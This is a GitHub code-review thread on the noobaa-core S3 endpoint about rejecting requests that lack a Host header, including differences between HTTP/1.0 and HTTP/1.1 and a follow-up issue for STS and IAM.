Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:102]: @naveenpaul1 I don't think this is enough, this is true to http1.0, I just noticed that when using HTTP1.1 we get  `HTTP/1.1 400 Bad Request`
`curl https://noobaa-core-rpms.s3.amazonaws.com -H 'Host:' -v`
`curl https://noobaa-core-rpms.s3.amazonaws.com -H 'Host:' -v -L`
please try to do some more research here about the proper behavior

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:102]: @romayalon checked AWS doc and Host header is required for AWS request, and

**Review by romayalon — APPROVED** [review]
@naveenpaul1 Can you pls check if we need to fix the missing hostname header on STS and IAM as well? or at least open an issue

**Comment by naveenpaul1** [comment]
@romayalon new issue opened: https://github.com/noobaa/noobaa-core/issues/8617

File: src/endpoint/s3/s3_rest.js (hunk 6 above)
Comment (shirady) [reply src/endpoint/s3/s3_rest.js:103]: @naveenpaul1, something that I didn't understand - if the error code depends on the HTTP version (1.0 or 1.1), why do we always return a status code of 400?

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:103]: @shirady I think default `http` version is 1.1 and we will support that one.

Comment (shirady) [reply src/endpoint/s3/s3_rest.js:103]: @naveenpaul1 thanks, where do I see it?

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:103]: @shirady request a HTTP call without mentioning the version and the default would be 1.1, not sure it's mentioned in the doc. I believe all of our API services are written assuming Noobaa will get HTTP 1.1 version request.
